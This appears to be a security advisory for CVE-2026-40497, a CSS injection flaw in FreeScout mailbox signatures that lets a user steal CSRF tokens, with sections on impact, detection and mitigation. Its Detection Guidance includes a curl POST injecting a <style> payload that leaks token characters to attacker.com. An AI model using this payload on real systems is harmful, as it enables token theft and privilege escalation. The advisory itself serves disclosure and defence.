Executive Summary

CVE-2026-40497 is a high-severity vulnerability in FreeScout versions prior to 1.8.213 involving CSS injection via the mailbox signature field. The function Helper::stripDangerousTags() removes dangerous HTML tags like <script>, <form>, <iframe>, and <object>, but does not remove <style> tags. This allows an attacker with access to mailbox settings (admin or agent with mailbox permission) to inject malicious CSS into the mailbox signature.

The mailbox signature is saved through a POST request and later rendered unescaped in conversation views, enabling the injected <style> tags to execute inline CSS. Because the Content Security Policy (CSP) allows 'unsafe-inline' styles, the injected CSS runs without restriction.

The attacker uses CSS attribute selectors targeting the CSRF token input field to exfiltrate the CSRF token character-by-character by causing the victim’s browser to make requests to attacker-controlled URLs. With the stolen CSRF token, the attacker can perform unauthorized state-changing actions as the victim, such as creating admin accounts or changing passwords, effectively escalating privileges from agent to admin.

This vulnerability is a regression or incomplete fix of a previous advisory that addressed XSS via mailbox signatures but did not remove <style> tags. It was patched in FreeScout version 1.8.213 by improving tag sanitization to include <style> tags.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability allows an attacker with mailbox settings access to inject malicious CSS that can steal CSRF tokens from other agents or admins who view conversations in the affected mailbox.

With the stolen CSRF token, the attacker can perform any state-changing action on behalf of the victim, such as creating new admin accounts, changing email addresses or passwords, and escalating privileges from agent to admin.

This leads to a significant compromise of confidentiality and integrity within the FreeScout system, potentially allowing unauthorized control over the help desk environment.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by checking if the mailbox signature field in FreeScout contains unfiltered <style> tags that could be used for CSS injection. Specifically, an attacker with mailbox settings access can inject CSS payloads via POST requests to /mailbox/settings/{id}.

A practical detection method involves inspecting the mailbox signature content for the presence of <style> tags or suspicious CSS attribute selectors targeting the CSRF token input field (e.g., input[name="_token"]).

For example, you can use the following curl command to retrieve the mailbox signature settings and check for <style> tags:

• curl -X GET -u <user>:<password> https://<freescout-host>/mailbox/settings/<id>

Additionally, to test if the vulnerability exists, you can attempt to inject a CSS payload via a POST request and verify if it is stored verbatim and rendered unescaped:

• curl -X POST -u <user>:<password> -d 'signature=<style>input[name="_token"][value^="A"]{background:url(http://attacker.com/?token=A);}</style>' https://<freescout-host>/mailbox/settings/<id>

Monitoring network traffic for unusual outbound requests to attacker-controlled domains triggered by CSS exfiltration can also help detect exploitation attempts.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate mitigation step is to upgrade FreeScout to version 1.8.213 or later, where the vulnerability is fixed by enhancing the sanitization function to remove <style> tags from mailbox signatures.

If upgrading immediately is not possible, restrict mailbox settings modification permissions to trusted administrators only, as the attack requires mailbox settings access.

Additionally, review and tighten the Content Security Policy (CSP) to disallow 'unsafe-inline' styles if feasible, reducing the risk of CSS injection execution.

Finally, monitor mailbox signature fields for suspicious <style> tags and remove any unauthorized CSS injections.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability in FreeScout allows an attacker with mailbox settings access to exfiltrate CSRF tokens of agents or admins by injecting malicious CSS into mailbox signatures. With the stolen CSRF tokens, attackers can perform unauthorized state-changing actions such as creating admin accounts or changing passwords, leading to privilege escalation.

This unauthorized access and privilege escalation could lead to breaches of confidentiality and integrity of sensitive data managed within FreeScout, potentially violating data protection regulations such as GDPR or HIPAA that require strict controls over access and protection of personal or health information.

Therefore, the vulnerability poses a significant risk to compliance with common standards and regulations by enabling attackers to bypass security controls and manipulate sensitive data or user privileges.

Useful 0 Not Useful 0